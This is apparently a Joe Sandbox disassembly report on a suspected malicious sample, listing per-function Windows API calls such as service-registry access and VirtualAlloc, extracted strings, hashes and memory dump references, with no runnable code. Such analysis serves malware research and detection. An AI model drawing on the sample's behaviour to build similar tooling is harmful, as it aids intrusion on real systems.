                                • Opcode ID: 1548e5487a5efdfbb671efad508a1100b64729e1f12422703f2de53037384db5
                                • Instruction ID: 6988f553b5177ff2091b323e3abfef4d7abe90cae60363d80abc381a855a4774
                                • Opcode Fuzzy Hash: 1548e5487a5efdfbb671efad508a1100b64729e1f12422703f2de53037384db5
                                • Instruction Fuzzy Hash: 4B01F576E001127BDB04B998DCD6E7FB35EEBB4320F04811BFE059B342EA61A91186F5
                                APIs
                                • _memset.LIBCMT ref: 10003EE9
                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?,?,75920F00,7555B5F0), ref: 10003F4F
                                Strings
                                • SYSTEM\CurrentControlSet\Services\, xrefs: 10003EF3
                                • Rsymwe miusskwq, xrefs: 10003F02
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Open_memset
                                • String ID: Rsymwe miusskwq$SYSTEM\CurrentControlSet\Services\
                                • API String ID: 3956736456-107533463
                                • Opcode ID: 5438ce4596e11e2073f59ae6f071c2823a2c53e5addf3c632f58fd4c6066d846
                                • Instruction ID: 7b91505d867ce7cdeb3b6398e8ff761e9cb3cb57524512d0c09d5bdabadd9f79
                                • Opcode Fuzzy Hash: 5438ce4596e11e2073f59ae6f071c2823a2c53e5addf3c632f58fd4c6066d846
                                • Instruction Fuzzy Hash: 77014732A041195BEB15C5648C2ABFB77A9EB91740F4041A8F9C5AF180EEF26E89C3C0
                                APIs
                                • IsWindow.USER32(?), ref: 006F8142
                                • GetWindowTextLengthA.USER32(?), ref: 006F8170
                                • GetWindowTextA.USER32(?,00000000,?), ref: 006F8194
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006F8151
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$MessageText$LengthPeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 1501494189-4102074842
                                • Opcode ID: 9de8ff7d0010cac5912f74014fd4e486e13cceb52fd4b9aba3026ba4b7b6a902
                                • Instruction ID: 2a031739fa68a3a31671a6eac433411caa25895eb76f29d4fd498229b72e6163
                                • Opcode Fuzzy Hash: 9de8ff7d0010cac5912f74014fd4e486e13cceb52fd4b9aba3026ba4b7b6a902
                                • Instruction Fuzzy Hash: B8111F75604209EFCB04DF98C885EAE77B6BF88310F104298F945A7391DB30ED82DB54
                                APIs
                                • GetWindowLongA.USER32(00000000,?), ref: 006F6097
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • SetWindowLongA.USER32(00000000,00000000,00000000), ref: 006F60C6
                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006F60E7
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006F6080
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$LongMessage$PeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 3830048501-4102074842
                                • Opcode ID: dba8babb2844671d58c7d3ae32cfc984636c9146782f037f3e171db3df960cc0
                                • Instruction ID: 74fb1f6bf5b39cd76f1d236ba70db1c20cfc00571d411226e33578f1a7797074
                                • Opcode Fuzzy Hash: dba8babb2844671d58c7d3ae32cfc984636c9146782f037f3e171db3df960cc0
                                • Instruction Fuzzy Hash: 2F01407550420DFFDB10CFA4C985BEE37BAEB84341F208114FA0997240CB35DA91DBA1
                                APIs
                                • IsWindow.USER32(?), ref: 0071C5F0
                                • ScreenToClient.USER32(?,006FB894), ref: 0071C619
                                • ScreenToClient.USER32(?,006FB88C), ref: 0071C62D
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdi.cpp, xrefs: 0071C5FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ClientMessageScreen$PeekPostQuitWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdi.cpp
                                • API String ID: 4124008570-2272135486
                                • Opcode ID: 8019ef0a9b2d196bb818d73079c4c058d04f5279f3135fd992547546d397bed8
                                • Instruction ID: 7d6e1c0204b58185e1d672aebba0b07f623f1a738fa94d57933e566e579b20f9
                                • Opcode Fuzzy Hash: 8019ef0a9b2d196bb818d73079c4c058d04f5279f3135fd992547546d397bed8
                                • Instruction Fuzzy Hash: FA01D1B6604108EBC710DF98CD85EAE77B8EF88304B244148F908D7382CB34ED51EB50
                                APIs
                                • PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                • PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuit
                                • String ID: U0o${/o
                                • API String ID: 1744142723-1266418979
                                • Opcode ID: 5c5cd283276806dc27cc836fb8d55da1a4e7fb392a496ba51a63fc6b2416adb4
                                • Instruction ID: 7d0e7b0ab1726ebe646398f148f9c9bdf4a91d8de0268a7fda3fe721d1f18ee6
                                • Opcode Fuzzy Hash: 5c5cd283276806dc27cc836fb8d55da1a4e7fb392a496ba51a63fc6b2416adb4
                                • Instruction Fuzzy Hash: 54F03A75A44308ABEB10DBA49D4AFEE77B8EB48700F004114FA04AB2C1E6759D51DB61
                                APIs
                                • IsWindow.USER32(?), ref: 00705D40
                                • GetWindowRect.USER32(?,ao), ref: 00705D66
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageWindow$PeekPostQuitRect
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl$ao
                                • API String ID: 2796992114-3573381271
                                • Opcode ID: c137684a0e62aa65238bb010b0c6685b348e69ea0b7f76e51789bc70e332f97b
                                • Instruction ID: 90ac3de15e04b1b113d985292407e63daba606ba0db945a59c2aa38deac0862d
                                • Opcode Fuzzy Hash: c137684a0e62aa65238bb010b0c6685b348e69ea0b7f76e51789bc70e332f97b
                                • Instruction Fuzzy Hash: 82E092B5704208EBC714CB94D989D6B77F8EF88340B24425EFA0997281DB35DD01EA54
                                APIs
                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10013CA6
                                • __isleadbyte_l.LIBCMT ref: 10013CD9
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,7555B5F0,00000000,?,?,?,000003FF,?,7555B5F0), ref: 10013D0A
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,7555B5F0,00000000,?,?,?,000003FF,?,7555B5F0), ref: 10013D78
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                • String ID:
                                • API String ID: 3058430110-0
                                • Opcode ID: fcfee0772972e61f0bf7816d8687c4625d1166ffd910dd2506994116e9198850
                                • Instruction ID: ab9021fcf3d870d2e23de3dab323b7068d524717285c676321d3edd793c3f935
                                • Opcode Fuzzy Hash: fcfee0772972e61f0bf7816d8687c4625d1166ffd910dd2506994116e9198850
                                • Instruction Fuzzy Hash: EA319C31A00296EFDB10CF64D884AAE3BE5FF01351F16C5A9E464AF1A1E731DD80DB90
                                APIs
                                • InterlockedIncrement.KERNEL32(?), ref: 006D2735
                                • _com_issue_error.COMSUPPD ref: 006D274B
                                • InterlockedDecrement.KERNEL32(?), ref: 006D277D
                                • SysFreeString.OLEAUT32(00000000), ref: 006D2792
                                  • Part of subcall function 006D22B0: CoInitialize.OLE32(00000000), ref: 006D22E0
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2322
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D233E
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2375
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D2392
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D23C8
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D23E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String_com_issue_error$Convert_com_util::$Interlocked$DecrementFreeIncrementInitialize
                                • String ID:
                                • API String ID: 737213347-0
                                • Opcode ID: e83a48af0f5f08ed6b33887dd6c5ca8cfc40fd7cb0bcbf7819a6b05dffeb4ea0
                                • Instruction ID: b3acf9bde33668cd780b25affb58a3400586cbdd186e4ea894636e5bd66d0076
                                • Opcode Fuzzy Hash: e83a48af0f5f08ed6b33887dd6c5ca8cfc40fd7cb0bcbf7819a6b05dffeb4ea0
                                • Instruction Fuzzy Hash: 8531CE72E01305ABDB20DF69C955B9AB7A8EF58710F10412AFC09E7381D734EE00CAA1
                                APIs
                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0076711D
                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00767174
                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00767190
                                  • Part of subcall function 00717C90: std::_Generic_error_category::_Generic_error_category.LIBCPMTD ref: 00717C9C
                                • std::_Fac_node::_Fac_node.LIBCPMTD ref: 007671AA
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessorVirtual$std::_$Concurrency::RootRoot::$Fac_nodeFac_node::_Generic_error_categoryGeneric_error_category::_Iterator_baseIterator_base::_
                                • String ID:
                                • API String ID: 2406718891-0
                                • Opcode ID: ff6f039cf7ff91e2757812096a48daf3b3d328c6d2753266953c217d70c14f8b
                                • Instruction ID: 8ce8bc79ebc0268c052605d68f12bf844d10e08a206fe747db4b3d27900a00c3
                                • Opcode Fuzzy Hash: ff6f039cf7ff91e2757812096a48daf3b3d328c6d2753266953c217d70c14f8b
                                • Instruction Fuzzy Hash: 6E311070A04249DFDB04DF98C466BAEBBB1FF44318F144169E6066B3C2CB756984CBA5
                                APIs
                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0077DACD
                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0077DAF9
                                • std::_Generic_error_category::_Generic_error_category.LIBCPMTD ref: 0077DB3D
                                  • Part of subcall function 0090B810: SetRectEmpty.USER32(ED5B0DC1), ref: 0090B81D
                                • std::_Fac_node::_Fac_node.LIBCPMTD ref: 0077DB85
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$ProcessorVirtual$Concurrency::EmptyFac_nodeFac_node::_Generic_error_categoryGeneric_error_category::_Iterator_baseIterator_base::_RectRootRoot::
                                • String ID:
                                • API String ID: 3523054471-0
                                • Opcode ID: 84a05506a8e3ae898b76f367df6dcb471131b3a7a79375c0b3284f560634a470
                                • Instruction ID: 6b29db5bb87aef966cdb40caff4beb582fdc7392f87c26dd4d63a4b1e22923f6
                                • Opcode Fuzzy Hash: 84a05506a8e3ae898b76f367df6dcb471131b3a7a79375c0b3284f560634a470
                                • Instruction Fuzzy Hash: 43314A70E00249CFDB04DF98C496BAEBBB1EF85318F148168EA166B3C2CB756844CB95
                                APIs
                                • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,00000000,00000000,?,?,?,10006F52,?,?,00000000,00000000,?,?), ref: 10006A04
                                • _memset.LIBCMT ref: 10006A11
                                • VirtualAlloc.KERNEL32(?,C483F08B,00001000,00000004,00000000,00000000,?,?,?,10006F52,?,?,00000000,00000000,?,?), ref: 10006A26
                                • _memmove.LIBCMT ref: 10006A39
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual$_memmove_memset
                                • String ID:
                                • API String ID: 725130153-0
                                • Opcode ID: 049f7836f4cbeb483529ca24c586d39e573a16cbf8e095f834d7a5b2932a6f08
                                • Instruction ID: 1fe11c68dc2f87ea9c2496aa02b4c72087147071ef5c343ae1971446cb7f713c
                                • Opcode Fuzzy Hash: 049f7836f4cbeb483529ca24c586d39e573a16cbf8e095f834d7a5b2932a6f08
                                • Instruction Fuzzy Hash: 7F119A74200200AFE724CF48CC84F6AB3EAEF89790F25845CFA459B345C671ED81CB61
                                APIs
                                • VariantInit.OLEAUT32(ED5B0DC1), ref: 006E2E87
                                • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 006E2EAF
                                • _com_issue_error.COMSUPPD ref: 006E2EBA
                                • VariantClear.OLEAUT32(?), ref: 006E2ECE
                                  • Part of subcall function 006E2D40: InterlockedDecrement.KERNEL32(?), ref: 006E2D8C
                                  • Part of subcall function 006E2D40: SysFreeString.OLEAUT32(00000000), ref: 006E2DA1
                                  • Part of subcall function 006E2D40: SysAllocString.OLEAUT32(?), ref: 006E2DF2
                                  • Part of subcall function 006E2D40: _com_issue_error.COMSUPPD ref: 006E2E08
                                  • Part of subcall function 006E2D40: _com_issue_error.COMSUPPD ref: 006E2E21
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Variant_com_issue_error$String$AllocChangeClearDecrementFreeInitInterlockedType
                                • String ID:
                                • API String ID: 3917496286-0
                                • Opcode ID: c93ebe16634c8538d394792e5c96b0d636f67e3672e952a20938ed3eab8f1b85
                                • Instruction ID: 8ee972eaf66c815e5a662d17220547c7ba33718a10c333ea8255fcd9c9b902c8
                                • Opcode Fuzzy Hash: c93ebe16634c8538d394792e5c96b0d636f67e3672e952a20938ed3eab8f1b85
                                • Instruction Fuzzy Hash: 1011C172E0434AABCB24EFA5CC04BAEB3BEFB84710F00851AF91193394DB78A9058750
                                APIs
                                • IsWindowVisible.USER32(?), ref: 10005ADE
                                • _memset.LIBCMT ref: 10005AFD
                                • SendMessageA.USER32(?,0000000D,00000400,00000000), ref: 10005B14
                                • lstrlenA.KERNEL32(00000000), ref: 10005B21
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageSendVisibleWindow_memsetlstrlen
                                • String ID:
                                • API String ID: 1293396957-0
                                • Opcode ID: fa6ce2583bd9767534daced31be07b8326a82e7d065c97d9bde152224b6d5100
                                • Instruction ID: ff19169a40d0a294d63041ee506df1cf480c2dfb7070b0d4c1a204f6836a31c9
                                • Opcode Fuzzy Hash: fa6ce2583bd9767534daced31be07b8326a82e7d065c97d9bde152224b6d5100
                                • Instruction Fuzzy Hash: A501F9769001146BF710DB649C45FAA339CEB04745F044095FB04E7180EB75FA4187E4
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                • String ID:
                                • API String ID: 3016257755-0
                                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                • Instruction ID: a529445dcc279c096235351e5983a26d67c533a38f151038134ff7b3280c761d
                                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                • Instruction Fuzzy Hash: F3114E3640014ABBDF129E84DC02CDE3F62FF5A290F558625FA1959135C237D9B1AB81
                                APIs
                                • _malloc.LIBCMT ref: 1000822A
                                  • Part of subcall function 10008730: __FF_MSGBANNER.LIBCMT ref: 10008749
                                  • Part of subcall function 10008730: __NMSG_WRITE.LIBCMT ref: 10008750
                                  • Part of subcall function 10008730: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,1000F48D,0000000C,00000001,0000000C,?,1000BA5C,00000018,10018E90,0000000C,1000BAEC), ref: 10008775
                                • std::exception::exception.LIBCMT ref: 1000825F
                                • std::exception::exception.LIBCMT ref: 10008279
                                • __CxxThrowException@8.LIBCMT ref: 1000828A
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                                • String ID:
                                • API String ID: 1414122017-0
                                • Opcode ID: 0bb546241257d5a02f622bd4a5ea69982a5af1810815338f4d8f70671dd853a6
                                • Instruction ID: 5a71771b979b641a35d5eb9fed7bb85ff4467e0caf7459661948b9aaba2a15df
                                • Opcode Fuzzy Hash: 0bb546241257d5a02f622bd4a5ea69982a5af1810815338f4d8f70671dd853a6
                                • Instruction Fuzzy Hash: F7F0A435804A5ABAFB04FF58DC45A9D7BE9FB403D0F54402AF540AA0A9CF71DB41C751
                                APIs
                                • CloseServiceHandle.ADVAPI32(00000000,10003E73), ref: 10003E8F
                                • CloseServiceHandle.ADVAPI32(00000000,10003E73), ref: 10003E9A
                                • RegCloseKey.ADVAPI32(?,10003E73), ref: 10003EA8
                                • Sleep.KERNEL32(000001F4,10003E73), ref: 10003EB3
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
